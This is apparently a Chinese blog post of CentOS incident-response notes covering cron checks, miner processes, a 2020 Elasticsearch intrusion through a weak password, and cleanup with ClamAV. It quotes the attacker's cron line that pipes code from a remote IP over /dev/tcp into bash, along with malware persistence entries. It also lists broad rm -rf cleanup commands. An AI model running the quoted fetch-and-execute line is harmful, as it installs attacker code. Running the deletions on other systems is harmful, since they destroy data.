原创

CentOS-安装杀毒软件-查看crontab定时任务-查可疑进程

1、检查crontab定时任务
cat /var/spool/cron/root (vi编辑这个 直接删除,crontab -l 也将看不到了)
*/10 * * * * bash -c cat</dev/tcp/159.89.190.243/44444|bash
ll /etc/cron.*

2、查进程
top 或者 top d1 查看烧CPU的进程
找到进程名称 > whereis 进程名称 > 查到路径 > 锁死文件
chmod 000 /usr/bin/gpg-agentd
chattr +i /usr/bin/gpg-agentd

chmod 000 /usr/bin/masscan
chattr +i /usr/bin/masscan

禁止使用弱密码;
禁止放开各种服务端口,只通过80端口;
尽量不使用默认端口。

记录2020年6月18号es被入侵:

> top
发现先后存在两个进程占用大量cpu
kswapd0
tsm

> cat /tmp/up.txt
elasticsearch 123456

> find / -name "dota3.tar.gz"

查看所有用户的定时任务:
> cat /etc/passwd | cut -f 1 -d : |xargs -I {} crontab -l -u {}

定时任务中显示了病毒文件启动的
1 1 */2 * * /home/elasticsearch/.configrc/a/upd>/dev/null 2>&1
@reboot /home/elasticsearch/.configrc/a/upd>/dev/null 2>&1
5 8 * * 0 /home/elasticsearch/.configrc/b/sync>/dev/null 2>&1
@reboot /home/elasticsearch/.configrc/b/sync>/dev/null 2>&1
0 0 */3 * * /tmp/.X25-unix/.rsync/c/aptitude>/dev/null 2>&1

需要先切换到
> su elasticsearch
> crontab -e
> su root
> /sbin/service crond restart 

> chmod 000 /tmp/.X25-unix/*
> chattr +i /tmp/.X25-unix/*

> chmod 000 /home/elasticsearch/.configrc/*
> chattr +i /home/elasticsearch/.configrc/*

> userdel -r elasticsearch

userdel: user elasticsearch is currently used by process 4347
停用es

> ps aux | grep elastic
elastic+ 4900 0.0 0.0 107904 612 ? S 18:08 0:00 sleep 25s
root 4917 0.0 0.0 112676 984 pts/0 R+ 18:08 0:00 grep --color=auto elastic
elastic+ 20570 0.0 0.2 136452 3984 ? S 16:32 0:00 rsync
elastic+ 21146 0.0 0.0 113228 1640 ? S 16:36 0:00 /bin/bash ./go

> rm -rf /home/elasticsearch/ //elasticsearch启动es的专用账户,下同

> rm -rf root/.ssh
> rm -rf /home/elasticsearch/.ssh/
> rm -rf /tmp/ 可能提示 rm: 无法删除"/tmp/": 设备或资源忙

恢复账户的正常文件,并修改所有权
> cp -a /etc/skel/.bash_logout /home/elasticsearch/
> cp -a /etc/skel/.bash_profile /home/elasticsearch/
> cp -a /etc/skel/.bashrc /home/elasticsearch/

> chown -R elasticsearch /home/elasticsearch

https://www.latelee.org/devops/attack-tsm.html

3、查带宽-数据包
腾讯 Linux系统针对CPU/内存/带宽的业务自检
https://cloud.tencent.com/developer/ask/23610

4、安装杀毒软件Clamav
https://www.cnblogs.com/k98091518/p/6909364.html
执行扫描:
clamscan -r /root
clamscan -r /home

Centos7最小安装下安装 Clamav

正文到此结束
本文目录